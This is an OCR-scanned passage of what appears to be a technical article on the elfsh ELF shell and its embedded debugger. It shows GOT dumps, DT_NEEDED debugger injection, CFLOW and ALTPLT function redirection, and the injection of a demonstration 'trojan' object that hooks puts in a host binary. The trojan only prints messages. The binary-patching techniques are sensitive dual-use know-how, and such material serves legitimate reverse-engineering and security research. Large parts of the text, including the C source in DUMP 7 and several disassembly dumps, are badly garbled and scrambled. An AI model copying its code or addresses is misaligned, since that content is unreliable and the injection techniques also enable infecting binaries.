0x08049904: [7] 0x080483DE <__libc_start_main> 
0x08049908: [8] 0x080483EE <printf> 
0x0804990C: [9] 0x080483FE <free> 
0x08049910: [10] 0x0804840E <read> 

[Global Offset Table .::. GOT : .elfsh.altgot ] 
[Object ./a.out_e2dbg] 

0x08049928: [0] 0x0804981C <_DYNAMIC> 
0x0804992C: [1] 0x00000000 <?> 

0x08049930: [2] 0x00000000 <?> 

0x08049934: [3] 0x0804839E <fflush> 
0x08049938: [4] 0x080483AE <puts> 
0x0804993C: [5] 0x080483BE <malloc> 
0x08049940: [6] 0x080483CE <strlen> 
0x08049944: [7] 0x080483DE <__libc_start_main> 
0x08049948: [8] 0x080483EE <printf> 
0x0804994C: [9] 0x080483FE <free> 
0x08049950: [10] 0x0804840E <read> 
0x08049954: [11] 0x0804614A <e2dbg_run + 6> 


========= END DUMP 1 ========= 


There are many things to notice in this dump. First you can 
verify that it actually does what it is supposed to by 
looking the first GOT entries which are reserved for the 
linkmap and the rtld dl-resolve function. Thos ntries ar 
filled at runtime, so the static GOT version contains NULL 
pointers for them. However the GOT which stands in memory has 
them filled. 


Also, the new version of the GNU linker does insert multiple 
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GOT sections inside ELF binaries. The .got section handles 
the pointer for external variables, while .got.plt handles 
the external function pointers. In earlier versions of LD, 
those 2 sections were merged. We support both conventions. 
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Finally, you can see in last the .elfsh.altgot section. 
That is part of the ALTGOT technique and it will be 
explained as a standalone algorithm in the next parts 

of this paper. The ALTGOT technique allow for a size 
extension of the Global Offset Table. It allows different 
things depending on the architecture. On x86, ALTGOT is 
only used when EXTPLT is used, so that we can add extra 
function to the host file. On MIPS and ALPHA, ALTGO 
allows to redirect an extern (PLT) function without losing 
the real function address. We will develop both of these 
techniques in the next parts. 


Li 


al debugging dumping, backtrace, breakpoints 


When performing debugging using a debugger embedded in the 
debugg process, we do not need ptrace so we cannot 

modify so easily the process address space. That’s why 

we have to do small static changes we add the debugger 

as a DT_NEEDED dependancy. The debugger will also overload some 
signal handlers (SIGTRAP, SIGINT, SIGSEGV ..) so that it 

can takes control on those events. 


G 


We can redirect functions as well using either the CFLOW or 
ALTPLT technique using on-disk modification, so that we takes 
control at the desired moment. Obviously we can also set 
breakpoints in runtime but that need to mprotect the code zon 
if it was not writable for the moment. We have idea about how 
to get rid of mprotect but this was not implemented in that 
version (0.65). Indeed, many uses of the mprotect system call 
are incompatible with one of the PaX option). Fortunately 

we assume for now that we have read access to the debuggee 
program, which means that we can copy the file and disable 
that option. 


This is how the DT_N ED dependence is added 


EGIN DUMP 2 


S$ cat inject_e2dbg.esh 


!../../vm/elfsh 

load a.out 

set 1l.dynamic[08].val 
set l.dynamic[08].tag 
redir main e2dbg_run 

save a.out_e2dbg 


END DUMP 2 


Let’s see t 


Ox2 
DT_N 


he modified binary .dynamic section, w 


extra DT_N 


G 


‘ED 


ED entries were added using the DT_D 


technique t 


elfsh@WTH $ 


[*] Object 


hat we published 2 years ago [0] 


BEGIN DUMP 3 ========= 
./../vm/elfsh -f ./a.out -d DT_NEEDED 
./a.out has been loaded (O_RDONLY) 


here the 
E.BUG 


9.txt Wed Apr 26 09:43:45 2017 8 


[SHT_DYNAMIC] 
[Object ./a.out] 


[00] Name of needed library => libc.so.6 {DT_NEEDED} 


[*] Object ./a.out unloaded 


elfsh@WTH $ ../../vm/elfsh -f ./a.out_e2dbg -d DT_NEEDED 


*] Object ./a.out_e2dbg has been loaded (O_RDONLY) 


SHT_DYNAMIC] 
Object ./a.out_e2dbg] 


O 


00] Name of needed library => libc.so.6 {DT_NEEDED} 
08] Name of needed library => ibc.so.6 {DT_NEEDED} 


*] Object ./a.out_e2dbg unloaded 


========= EFND DUMP 3 ========= 


Let’s see how we redirected the main function to the hook_main 
function. You can notice the overwritten bytes between the 2 jmp 
of the hook_main function. This technique is also available MIPS 
architecture, but this dump is from the IA32 implementation 


========= BEGIN DUMP 4 ========= 


elfsh@WTH S$ ../../vm/elfsh -f ./a.out_e2dbg -D main%40 


[*] Object ./a.out_e2dbg has been loaded (O_RDONLY) 


08045134 [foff: 308] hook_main + 0 Jmp <e2dbg_run> 
08045139 [foff: 313] hook_main + 5 push ‘%ebp 

0804513A [foff: 314] hook_main + 6 mov sesp, sebp 
0804513C [foff: 316] hook_main + 8 push ‘f%esi 

0804513D [foff: 317] hook_main + 9 push ‘%ebx 

0804513E [foff: 318] hook_main + 10 jmp <main + 5> 
08045139 [foff: 313] old_main + 0 push f%ebp 

0804513A [foff: 314] old_main + 1 mov sesp, sebp 
0804513C [foff: 316] old_main + 3 push %esi 

0804513D [foff: 317] old_main + 4 push %ebx 

0804513E [foff: 318] old_main + 5 jmp <main + 5> 
08048530 [foff 3616] main + 0 jmp <hook_main> 
08048535 [foff 3621] main + 5 sub $2010, %esp 
0804853B [foff 3627] main + 11 mov 8 (Sebp) , sebx 
0804853E [foff 3630] main + 14 mov C(%Sebp), esi 
08048541 [foff 3633] main + 17 and SFFFFFFFO, %esp 
08048544 [foff 3636] main + 20 sub $10, %esp 
08048547 [foff 3639] main + 23 mov sebx,4(%esp,1) 
0804854B [foff 3643] main + 27 mov $<_IO_stdin_used + 43>, (%esp,1) 
08048552 [foff 3650] main + 34 call <printf> 
08048557 [foff: 13655] main + 39 mov (Sesi),%eax 


[*] No binary pattern was specified 
[*] Object ./a.out_e2dbg unloaded 


========= END DUMP 4 ========= 


Let’s now execute the debugg program, in which the 
debugger was injected. 
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EGIN DUMP 5 


elfsh@WTH S$ ./a.out_e2dbg 


The Embedded ELF Debugger 0.65 (32 bits built) 
This software is under the General Public License V.2 
Please visit http://www.gnu.org 
*] Sun Jul 31 17:56:52 2005 - New object ./a.out_e2dbg loaded 
*] Sun Jul 31 17:56:52 2005 - New object /lib/tls/libc.so.6 loaded 
*] Sun Jul 31 17:56:53 2005 - New object ./ibc.so.6 loaded 
*] Sun Jul 31 17:56:53 2005 - New object /lib/ld-linux.so.2 loaded 
*] Sun Jul 31 17:56:53 2005 - New object /lib/libelfsh.so loaded 
*] Sun Jul 31 17:56:53 2005 - New object /lib/libreadline.so.5 loaded 
*] Sun Jul 31 17:56:53 2005 - New object /lib/libtermcap.so.2 loaded 
*] Sun Jul 31 17:56:53 2005 - New object /lib/libdl.so.2 loaded 
*] Sun Jul 31 17:56:53 2005 - New object /lib/libncurses.so.5 loaded 
(e2dbg-0.65) b puts 
[*] Breakpoint added at <puts@a.out_e2dbg> (0x080483A8) 
(e2dbg-0.65) continue 
[..: Embedded ELF Debugger returns to the grave Pal 
[e2dbg_run] returning to 0x08045139 
[host] main arge 1 
[host] argv[0] is ./a.out_e2dbg 


First_printf test 


The Embedded 


ELF Debugger 0.65 


(32 bits buil 


This software is under the General Publ 
Please visit http://www.gnu.org 


[*] Sun Jul 31 17:57:03 2005 - New object /lib/tls/] 


Lt) 


lic License V.2 


libc.so.6 loaded 


(e2dbg-0.65) bt 

Backtrace 
00] OxB7DC1EC5 <vm_bt@ibc.so.6 + 208> 
O01] OxB7DC207F <cmd_bt@ibc.so.6 + 152> 
02] OxB7DBC88C <vm_execmd@ibc.so.6 + 174> 
03] OxB7DAB4DE <vm_loop@ibc.so.6 + 578> 
04] OxB7DAB943 <vm_run@ibc.so.6 + 271> 
05] OxB7DAS5SFFO <e2dbg_entry@ibc.so.6 + 110> 
06] OxB7DA68D6 <e2dbg_genericbp_ia32@ibc.so.6 + 183> 
O07] OxFFFFE440 <_r_debug@ld-linux.so.2 + 1208737648> 
08] OxBY7DF7F3B <__libc_start_main@libc.so.6 + 235> 
09] 0x08048441 <_start@a.out_e2dbg + 33> 
(e2dbg-0.65) b 

Breakpoints 
[00] 0x080483A8 <puts@a.out_e2dbg> 


(e2dbg-0.65) delete 0x080483A8 


[*] Breakpoint at 080483A8 <puts@a.out_e2dbg> 


(e2dbg-0.65) b 


removed 


# sigtrap retaddr 
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Breakpoints 


le 


(e2dbg-0.65) 


[*] 


(e2dbg-0.65) 


No breakpoints 


b printf 


dumpregs 


Registers 


00000000 
08203F48 
00000000 
B7FOC7CO 


BFE3B7C4 


BFE3B750 
BFE3970C 


(e2dbg-0. 


Stack 
OxBFE37200 
OxBFE37204 
OxBFE37208 
OxBFE3720C 
OxBFE37210 
OxBFE37214 
OxBFE37218 
OxBFE3721C 
OxBFE37220 
OxBFE37224 
OxBFE37228 
OxBFE3722C 
OxBFE37230 
OxBFE37234 
OxBFE37238 
OxBFE3723C 
OxBFE37240 
OxBFE37244 
OxBFE37248 
OxBFE3724C 


(e2dbg-0.65) 


[ee verd 


First_puts 


65) 


The 


Sun Jul 


Sun Jul 


eae 


(e2dbg-0.65) 


BFE3B738 
080483A9 


stack 20 


0x00000000 
OxB7DC2091 
OxB7DDF5F0 
OxBFE3723C 
OxB7DC22E7 
0x00000014 
0xB7DDDD90 
OxBFE37230 
OxB7DB9IDF9 
OxB7DELA7C 
OxB7DA8176 
0x080530B8 
0x00000014 
Ox08264FF6 
OxB7DDF5F0 
OxBFE3726C 
OxB7DBC88C 
0x0804F208 
0x00000000 
0x00000000 


Gl 


continue 


Embedded 


Embedded 


Breakpoint added at <printf@a.out_e2dbg> 


10 


(0x080483E8) 
(0000000000) <unknown> 
(0136331080) <.elfsh.relplt@a.out_e2dbg + 1811272> 
(0000000000) <unknown> 
(3086010304) <__guard@libc.so.6 + 1656> 
(3219371972) <_r_debug@ld-linux.so.2 + 133149428> 
(3219371856) <_r_debug@ld-linux.so.2 + 133149312> 
(3219363596) <_r_debug@ld-linux.so.2 + 133141052> 
(3219371832) <_r_debug@ld-linux.so.2 + 133149288> 
(0134513577) <puts@a.out_e2dbg> 
<(null)> 
<vm_dumpstack@ibc.so.6> 
<_GLOBAL_OFFSET_TABLE_@ibc.so.6> 
<_r_debug@ld-linux.so.2 + 133131628> 
<cmd_stack@ibc.so.6 + 298> 
<_r_debug@ld-linux.so.2 + 1208744772> 
<__FUNCTION__.5@ibc.so.6 + 49> 
<_r_debug@] linux.so.2 + 133131616> 
<vm_implicit@ibc.so.6 + 304> 


<world@ibc.so.6 + 92> 
<do_resolve@ibc.so.6> 


<.elfsh.rel 


<_r_debug@] 


inux.so.2 4 


<.elfsh.rel 


<_GLOBAL_OFF'S 


ET TABL 


<_r_debug@] 


linux.so.2 4 


<vm_execmd@ibc.so.6 + 174> 


1t@a.out_e2dbg + 38072> 

] t 1208744772> 
l1t@a.out_e2dbg + 2208758> 
E @ibc.so.6> 

+t 133131676> 


<.elfsh.relplt@a.out_e2dbg + 22024> 
<(null)> 

<(null)> 

ELF Debugger returns to the grave :...] 


ELF Debugger 0.65 


(32 bits built) 


This software is under the General Public License V.2 
Please visit http://www.gnu.org 


31 18:00:47 2005 - /lib/tls/libc.so.6 loaded 
31 18:00:47 2005 - /usr/lib/gconv/ISO08859-1.so loaded 


dumpregs 


Registers 


— 


= 
cal 


— 


FAX ] 
BX] 
ECX ] 


O0000000B 
08203F48 
OO000000B 


(0000000011) 
(0136331080) 
(0000000011) 


d-1 


inux.so.2 + 1208744763> 


<_r_debug@] 
<.elfsh.rel 
<_r_debug@] 


lplt@a.out_e2dbg + 1811272> 


d-1 


inux.so.2 4 


t 1208744763> 
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[EDX] B7FOC7CO (3086010304) <__guard@libc.so.6 + 1656> 

[ESI] BFE3B7C4 (3219371972) <_r_debug@ld-linux.so.2 + 133149428> 
[EDI] BFE3B750 (3219371856) <_r_debug@ld-linux.so.2 + 133149312> 
[ESP] BFE3970C (3219363596) <_r_debug@ld-linux.so.2 + 133141052> 
[EBP] BFE3B738 (3219371832) <_r_debug@ld-linux.so.2 + 133149288> 
[EIP] 080483E9 (0134513641) <printf@a.out_e2dbg> 


(e2dbg-0.65) linkmap 


.ii. Linkmap entries ae 
01] addr : 0x00000000 dy 


08] addr : 0xB7D31000 dy 
09] addr : OxB7D2D000 dy 
10] addr : OxB7CEBOOO dy 
11] addr : OxBé6D84000 dy 


OxB7D2FEEC — 
OxB7D2A1CO — 
OxB6D85F28 — 


lib/libdl.so.2 
lib/libncurses.so.5 
usr/lib/gconv/1IS08859-1.so0 


n 0x0804981C - 
02] addr : 0x00000000 dyn OxFFFFE590 - 
03] addr : 0xB7DE3000 dyn OxB7FOAD3C - /lib/tls/libc.so.6 
04] addr : 0xB7D95000 dyn OxB7DDFO1C - ./ibc.so.6 
05] addr : OxB7F29000 dyn OxB7F3FF14 - /lib/ld-linux.so.2 
06] addr : O0xB7D62000 dyn 0xB7D93018 - /lib/libelfsh.so 
07] addr : 0xB7D35000 dyn OxB7D5D46C - /lib/libreadline.so.5 
n 
n 
n 
n 


/ 
/ 
/ 
OxB7D34BB4 - /lib/libtermcap.so.2 
/ 
/ 
/ 


(e2dbg-0.65) exit 


*] Unloading object 1 (/usr/lib/gconv/1IS08859-1.s0) 

*] Unloading object 2 (/lib/tls/libc.so.6) 

*] Unloading object 3 (/lib/tls/libc.so.6) 

*] Unloading object 4 (/lib/libncurses.so.5) 

*] Unloading object 5 (/lib/libdl.so.2) 

*] Unloading object 6 (/lib/libtermcap.so.2) 

*] Unloading object 7 (/lib/libreadline.so.5) 

*] Unloading object 8 (/home/elfsh/WTH/elfsh/libelfsh/libelfsh.so) 

*] Unloading object 9 (/lib/1ld-linux.so.2) 

*] Unloading object 10 (./ibc.so.6) 

*] Unloading object 11 (/lib/tls/libc.so.6) 

*] Unloading object 12 (./a.out_e2dbg) * 

By :: The Embedded ELF Debugger 0.65 

Se======= END DUMP 5 ========= 


As you see, the use of the debugger is quite similar to other 
debuggers. The difference is about the implementation technique 
which allows for hardened and embedded systems debugging where 
ptrace is not present or disabled. 


We were told [9] that the sigaction system call enables the 
possibility of doing step by step execution without using 
ptrace. We did not have time to implement it but we will 
provide a step-capable debugger in the very near future. Since 
that call is not filtered by grsecurity and seems to be quite 
portable on Linux, BSD, Solaris and HP-UX, it is definitely 
worth testing it. 


---[ D. Dynamic analyzers generation 


Obviously, tools like ltrace [7] can be now done in elfsh 
scripts for multiple architectures since all the redirection 
stuff is available. 


We also think that the framework can be used in dynamic 
software instrumentation. Since we support multiple 
architectures, we let the door open to other development 
team to develop such modules or extension inside the ELF 
shell framework. 
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We did not have time to include an example script for now that 
can do this, but we will soon. The kind of interresting stuff 


that could be done and improved using the framework would 


take its inspiration in projects like fenris [6]. That could 
be done for multiple architectures as soon as the instruction 
format type is integrated in the script engine, using the code 


abstraction of libasm (which is now included as sources in 
elfsh). 


We do not deal with encryption for now, but some promising API 


[5] could be implemented as well for multiple architectures 
very easily. 


III. Better multiarchitecture ELF redirections 


In the first issue of the Cerberus ELF interface [0], we 
presented a redirection technique that we called ALTPLT. This 
technique is not enough since it allows only for PLT 
redirection on existing function of the binary program so 

the software extension usable functions set is limited. 


Morever, we noticed a bug in the previously released 
implementation of the ALTPLT technique : On the SPARC 
architecture, when calling the original function, the 


redirection was removed and the program continued to work as if 
no hook was installed. This bug came from the fact that Solaris 


does not use the r_offset field for computing its relocation 


but get the file offset by multiplying the PLT entry size by the 


pushed relocation offset on the stack at the moment of dynamic 


resolution. 


We found a solution for this problem. That solution consisted in 
adding some architecture specific fixes at the beginning of the 


ALTPLT section. However, such a fix is too much architecture 


dependant and we started to think about an alternative technique 


for implementing ALTPLT. As we had implemented the DT_DEBUG 
technique by modifying some entries in the .dynamic sections, 
discovered that many other entries ar rasable and allow for 
a very strong and architecture independant technique for 
redirecting access to various sections. More precisely, when 
patching the DT_PLTREL entry, we are able to provide our own 
pointer. DT_PLTREL is an architecture dependant entry and the 
documentation about it is quite weak, not to say inexistant. 


It actually points on the section of the executable beeing 
runtime relocated (e.g. GOT on x86 or mips, PLT on sparc and 
alpha). By changing this entry we are able to provide our own 
PLT or GOT, which leads to possibly extending it. 


Let’s first have look at the CFLOW technique and then comes 
back on the PLT related redirections using the DT_PLTREL 
modification. 


---[ A. CFLOW: PaxX-safe static functions redirection 


CFLOW is a simple but efficient technique for function 
redirection that are located in the host file and not 
having a PLT entry. 


Let’s see the host file that we use for this test: 


we 
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========= BEGIN DUMP 6 ========= 


elfsh@WTH S$ cat host.c 
include <stdio.h> 
include <stdlib.h> 
include <unistd.h> 


int legit_func(char *str) 
printf("legit func (%s) !\n", str); 


return (0); 


} 

int main () 

char *str; 
char buff[BUFSI2Z]; 
read(0, buff, BUFSIZ-1); 


str = malloc(10); 


if (str == NULL) 
goto err; 
strcpy(str, "test"); 


( 
printf ("First_printf %s\n", str); 
fflush(stdout); 
puts ("First_puts"); 
printf ("Second_printf %s\n", str); 


free(str); 
puts ("Second_puts"); 
fflush(stdout); 


legit_func ("test"); 
return (0); 


err: 
printf ("Malloc problem\n") ; 
return (-1); 


========= END DUMP 6 ========= 


We will here redirect the function legit_func, which is located 
inside host.c by the hook_func function located in the 
relocatable object. 


Let’s look at the relocatable file that we are going to inject 
in the above binary. 


========= BEGIN DUMP 7 ========= 


elfsh@WTH S$ cat rel.c 
include <stdio.h> 
include <stdlib.h> 
include <unistd.h> 


int glvar_testreloc = 42; 
int glvar_testreloc_bss; 
char glvar_testreloc_bss2; 
short glvar_testreloc_bss3; 


int hook_func(char *str) 
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printf ("HOOK FUNC %s 
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INnlty Str): 


return (old_legit_func(str)); 
} 
int puts_troj(char *str) 
{ 

siahe local = 1; 

char *str2; 

str2 = malloc(10); 

RSEGZ =H Ls 

*(str2 + 1) = 0x00; 

glvar_testreloc_bss 43; 

glvar_testreloc_bss2 = 44; 

glvar_testreloc_bss3 = 45; 


printf ("Trojan injected 
su: shhu: 


"PESi3S2 sue 


str2, str, 


g 
g 
g 


g 
1 


free(st 


1 e) 
tc 
TC 
tc 
te 
tc 
tc 
tc 
tc 


pu 
pu 
pu 
pu 
pu 
pu 
pu 
pu 
pu 


old_put 


write(1l 
fflush ( 
return 


} 


int ie 


{ 


return 


entry 


We can call it however using the 


of the 


ocal); 


r2); 


s(str); 


Ty 


stdout); 
(0); 


unc2 () 


(42); 


END DUMP 7 


As you can see, 
like write and putchar. 


got entry, 


, 


"calling write\n", 


ET 


Q 
cod 


u:%u] \n", 


lvar_testreloc, 
lvar_testreloc_bss, 
lvar_testreloc_bss2, 
lvar_testreloc_bss3, 


14); 


REL takes control now 
h 


14 


the relocatable object use of unknown functions 
Those functions do not have a symbol, 


plt 


or even relocatable entry in the host file. 


EX 


legit_func on the hook_func. 


PLT entry and we cannot use simple P 


We d 


PLT technique that will be 
described as a standalone technique in the next part of this paper. 
For now we focuss on the CFLOW technique that allow for redirection 


This functio 
iT infection 


lopped a technique that is Pax 


this kind of function. 


Vv 


It consists o 


instruction at the beginning of the 


on ou 
bytes 


r own code. 
somewher 


ELFsh will tak 


safe for o 


legit_func a 
of executi 


car 


lse and gives back 


@ontrol to.'t 


n does not have a 
for this. 


ndisk redirection of 


putting the good old jmp 


nd redirect the flow 
ng the overwritten 


he redirected 
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function, just after the jmp hook, so that no runtime restoration is 
needed and it stays PaX safe on disk. 


When these techniques are used in the debugger directly in memory 
and not on disk, they all break the mprotect protection of Pax, 

which means that this flag must be disabled if you want to redirect 
the flow directly into memory. We use use the mprotect syscall on 
s 
£ 
i 


mall code zone for beeing able to changes some specific instructions 
or redirection. However, we think that this technique is mostly 
nterresting for debugging and not for other things, so it is not 

our priority to improve this for now. 


Let’s see the small ELFsh script for this example 


========= BEGIN DUMP 8 ========= 


elfsh@WTH S$ file a.out 

a.out: ELF 32-bit LSB executable, Intel 80386, dynamically linked, \ 
n 

e 


ot stripped 
lfsh@WTH $ cat relinject.esh 
'../../../vm/elfsh 


load a.out 
load rel.o 


reladd 1 2 


redir puts puts_troj 
redir legit_func hook_func 


save fake_aout 


========= FND EXAMPLE 8 ========= 


The output of the ORIGINAL binary is as follow: 


========= BEGIN DUMP 9 ========= 


elfsh@WTH $ ./a.out 


First_printf test 
First_puts 
Second_printf test 
Second_puts 

LEGIT FUNC 

legit func (test) ! 


========= END DUMP 9 =========== 


Now let’s inject the stuff: 


========= BFGIN DUMP 10 ======== 


elfsh@WTH $ ./relinject.esh 


The ELF shell 0.65 (32 bits built) 


This software is under the General Public License V.2 
Please visit http://www.gnu.org 
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“load a.out 
[*] Sun Jul 31 15:30:14 2005 - New object a.out loaded 


“load rel.o 


[*] Sun Jul 31 15:30:14 2005 New object rel.o loaded 


“reladd 1 2 
Section Mirrored Successfully ! 


[*] ET_REL rel.o injected succesfully in ET_EXEC a.out 


“redir puts puts_troj 

[*] Function puts redirected to addr 0x08047164 <puts_troj> 
“redir legit_func hook_func 

[*] Function legit_func redirected to addr 0x08047134 <hook_func> 
“save fake_aout 

[*] Object fake_aout saved successfully 

“quit 

[*] Unloading object 1 (rel.o) 


[*] Unloading object 2 (a.out) * 
Bye -:: The ELF shell 0.65 


========= FND DUMP 10 ========= 


Let’s now execute the modified binary. 


Se======= BEGIN DUMP 11 ========= 
elfsh@WTH $ ./fake_aout 


First_printf test 

Trojan injected ET_REL takes control now [Z:First_puts:42:43:44:45:1] 
extcall! 

First_puts 

calling write 

Second_printf test 

Trojan injected ET_REL takes control now [Z:Second_puts:42:43:44:45:1] 
extcall! 

Second_puts 

calling write 

HOOK FUNC test ! 

Trojan injected ET_REL takes control now [Z:LEGIT FUNC:42:43:44:45:1] 
extcall! 

calling write 

legit func (test) ! 

elfsh@WTH $ 


========= END DUMP 11 ========= 


Fine. Clearly legit_func has been redirected on the hook 
function, and hook_func takes care of calling back the 
legit_func using the old symbol technique described in 
the first issue of the Cerberus articles serie. 


Let’s see the original legit_func code which is redirected 
using the CFLOW technique on the x86 architecture 


+t 4>, (Sesp,1) 


t 15>, 


(sesp,1) 


+t 4>, (Sesp,1) 


Ply 


(sesp,1) 
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========= BEGIN DUMP 12 ========= 
080484C0 legit_func + 0 push Sebp 
080484C1 legit_func + 1 mov Sesp, sebp 
080484C3 legit_func + 3 sub $8,%esp 
080484C6 legit_func + 6 mov $<_IO_stdin_used 4 
080484CD legit_func + 13 call <.plt + 32> 
080484D2 legit_func + 18 mov $<_IO_stdin_used | 
=S======== END DUMP 12 ========= 

Now the modified code: 
========= BEGIN DUMP 13 ========= 
080484CO legit_func + 0 jmp <hook_legit_func> 
080484C5 legit_func + 5 nop 
080484C6 legit_func + 6 mov $<_IO_stdin_used 4 
080484CD legit_func + 13 call <puts> 
080484D2 legit_func + 18 mov $<_IO_stdin_used | 
080484D9 legit_func + 25 mov 8 (Sebp) , seax 
080484DC legit_func + 28 mov Seax,4(%esp,1) 
080484E egit_func + 32 call <printf> 
080484E egit_func + 37 leave 
080484E egit_func + 38 xor Seax, eax 
========= END DUMP 13 ========= 

We create a new section .elfsh.hooks whoose data is an array 
of hook code stubs like this one: 

Se======= BEGIN DUMP 14 ========= 
08042134 hook_legit_func + 0 jmp <hook_func> 
08042139 old_legit_func + 0 push Sebp 
0804213A old_legit_func + 1 mov Sesp, sebp 
0804213C old_legit_func + 3 sub $8,%esp 
0804213F old_legit_func + 6 jmp <legit_func + 6> 
S======== END DUMP 14 ========= 


Because we want to be able to recall the original function 


(legit_func), 


first jmp 


was hijacked), 


symbol of 


This old symbols technique is coherent with the AL 
that we published in the first article. 
the old_funcname () 
calling back the good hijacked function, 
a single byte restoration at runtime. 


technique 


For the M 


we can see the result of it as well 


bi 


EGIN DUMP 15 


we add th 


rased bytes of it, 


just after the 


. Then we call back the legit_func at the good offset 
(so that we do not recurse inside the hook because the function 


example 14. 


is PaX compatible. 


IPS architecture, 


call insid 


as you can see starting at the old_l 


th 


legit_func 


PL 


technique 


We can as well 
injected C code for 

and we do that without 
That is why the CFLOW 


L use 


the CFLOW technique is quite similar, 


(DUMP 15 is the original 
nary and DUMP 16 the modified one): 
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400400 <func>: lui gp, Oxfcl 
400404 <funct4>: addiu gp,gp,-21696 
400408 <funct8>: addu gp,gp,t9 
40040c <funct12>: addiu sp,sp,-40 
400410 <funct16>: sw ra, 36(sp) 
feerer en] 

S======= END DUMP 15 ========= 


The modified func code is now 


<func> 

400400: addi t9,t9,104 Register T9 as target function 

400404: 5) 0x400468 <func2> Direct JMP on hook function 

400408: nop Delay slot 

40040c: addiu sp,sp,-40 The original func code 

400410: sw ra, 36(sp) 

400414: sw s8,32 (sp) 

400418 move s8,sp 

40041c sw gp, 16(sp) 

400420 SW a0, 40(s8) 

======== END DUMP 16 ========= 
The func2 function can be anything we want, provided that it has 
the same number and type of parameters. When the func2 function 
wants to call the original function (func), then it jumps on 
the old_func symbol that points inside the .elfsh.hooks section 
entry for this CFLOW hook. That is how looks like such a hooks 
entry on the MIPS architecture 

S======= BEGIN DUMP 17 ========= 


<old_func> 

3ff0f4 addi t9,t9,4876 

3ff0f8 lui gp, Oxfcl 

3ff0fc addiu gp,gp,-21696 

3£f£100 addu gp,gp,t9 

3ff104 5 0x400408 <func + 8> 
3££108 nop 

3f£10c nop 


======== FND DUMP 17 =========== 


As you can see, the thr instructions that got erased for 
installing the CFLOW hook at the beginning of func() are 
now located in the hook entry for func(), pointed by 

the old_func symbol. The T9 register is also reset so that 
we can come back to a safe situation before jumping back 
on func + 8. 


---[ B. ALTPLT technique revised 


ALTPLT technique vl was presented in the Cerberus ELF Interface [0] 
paper. As already stated, it was not satisfying because it was 
removing the hook on SPARC at the first original function call. 
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Since on SPARC the first 4 PLT entries are reserved, there is 
room for 12 instructions that would fix anything needed (actually 


the first PLT entry) at the moment when ALTPLT+0O takes control. 
ALTPLTv2 is working indeed in 12 instructions but it needed to 
reencode the first ALTPLT section entry with the code from PLT+0 


(which is relocated in runtime on SPARC before the main takes 


control, which explains why we cannot patch this on the disk 
statically). 
By this behavior, it breaks PaX, and the implementation is 


very architecture dependant since its SPARC assembly. For those 
who want to see it, we let the code of this in the ELFsh source 
tree in libelfsh/sparc32.c 


For the ALPHA64 architecture, 
respective instructions set, 
located in libelfsh/alpha64.c 


it gives pretty much the same in its 
and this time the implementation is 


As you can see in the code (that we will not reproduce here for 
clarity of the article), ALTPLTv2 is a real pain and we needed to 
get rid of all this assembly code that was requesting too much 
efforts for potential future ports of this technique to other 


architectures. 


Then we found the .dynamic DT_PLTREL trick and we tried to see what 
happened when changing this .dynamic entry inside the host binary. 
Changing the DI_PLTREL entry is very attractive since this is 
completely architecture independant so it works everywhere. 


Let’s see how look like the section header table and the .dynamic 
section used in the really simple ALTPLTv3 techniqu We use th 
-elfsh.altplt section as a mirror of the original .plt as explained 
in our first paper. The other lfsh.* sections has been explained 
already or will be just after the log. 


The output (modified) binary looks like 


BEGIN DUMP 18 


SECTION HEADER TABLE SHT is not stripped] 

Object fake_aout] 

000] 0x00000000 —------ Foff:00000000 sz:0000000 Link: 
001] 0x08042134 a-x---—- .elfsh.hooks Foff:00000308 sz:0000016 Link: 
002] 0x08043134 a-x -elfsh.extplt Foff:00004404 sz:0000048 link: 
003] 0x08044134 a-x---- .elfsh.altplt Foff:00008500 sz:0004096 Link: 
004] 0x08045134 a--ms-- rel.o.rodata.str1.32 foff:12596 sz:4096 lLlink: 
005] 0x08046134 a--ms-- rel.o.rodata.strl.1 foff:16692 sz:4096 lLlink: 
006] 0x08047134 a-x rel.o.text Foff:00020788 sz:0004096 Link: 
007] 0x08048134 a------ .interp Foff:00024884 sz:0000019 Link: 
008] 0x08048148 a -note.ABI-tag Foff:00024904 sz:0000032 Link: 
009] 0x08048168 a-—----- -hash Foff:00024936 sz:0000064 Llink:1 
010] 0x080481A8 a-—----- .dynsym Foff:00025000 sz:0000176 Link:1 
011] 0x08048258 a------ .dynstr Foff:00025176 sz:0000112 link: 
012] 0x080482C8 a------ -gnu.version Foff:00025288 sz:0000022 link:1 
013] Ox080482E0 a------ -gnu.version_r foff:00025312 sz:0000032 link:1 
014] 0x08048300 a------ .rel.dyn Foff:00025344 sz:0000016 Llink:1 
015] 0x08048310 a------ rel.plt Foff:00025360 sz:0000056 Link:1 
016] 0x08048348 a-x---- .init Foff:00025416 sz:0000023 link: 
017] 0x08048360 a-x---- .plt Foff:00025440 sz:0000128 link: 
018] 0x08048400 a-x---- .text Foff:00025600 sz:0000736 Link: 
019] O0x080486E0 a-x---- .fini Foff:00026336 sz:0000027 link: 
020] O0x080486FC a------ rodata Foff:00026364 sz:0000116 link: 
021] 0x08048770 a------ eh_frame Foff:00026480 sz:0000004 link: 
022] 0x08049774 aw----- ctors Foff:00026484 sz:0000008 Link: 
023] 0x0804977C aw----- dtors Foff:00026492 sz:0000008 Link: 
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024] 0x08049784 aw-----— ayer foff:00026500 sz:0000004 link: 
025] 0x08049788 aw----— .dynamic foff:00026504 sz:0000200 link: 
026] 0x08049850 aw-----— got foff:00026704 sz:0000004 link: 
027] 0x08049854 aw-----— -got.plt fFoff:00026708 sz:0000040 link: 
028] 0x0804987C aw-----— .data Foff:00026748 sz:0000012 Link: 
029] 0x08049888 aw-----— .bss foff:00026760 sz:0000008 link: 
030] 0x08049890 aw-----— rel.o.bss foff:00026768 sz:0004096 link: 
031] 0x0804A890 aw-----— rel.o.data foff:00030864 sz:0000004 link: 
032] 0x0804A894 aw-----— -elfsh.altgot foff:00030868 sz:0000048 link: 
033] Ox0804A8E4 aw----— .elfsh.dynsym foff:00030948 sz:0000208 link: 
034] Ox0804AA44 aw-----— .elfsh.dynstr Foff:00031300 sz:0000127 Link: 
035] Ox0804AB24 aw----- -elfsh.reldyn fFoff:00031524 sz:0000016 link: 
036] Ox0804AB34 aw-----— .elfsh.relplt Foff:00031540 sz:0000072 link: 
037] 0x00000000 -------— .comment foff:00031652 sz:0000665 link: 
038] 0x00000000 ------- .debug_aranges foff:00032324 sz:0000120 link: 
039] 0x00000000 ------- .debug_pubnames foff:00032444 sz:0000042 link: 
040] 0x00000000 -------— .debug_info Foff:00032486 sz:0006871 Link: 
041] 0x00000000 -------— .debug_abbrev foff:00039357 sz:0000511 link: 
042] 0x00000000 -------— .debug_line foff:00039868 sz:0000961 link: 
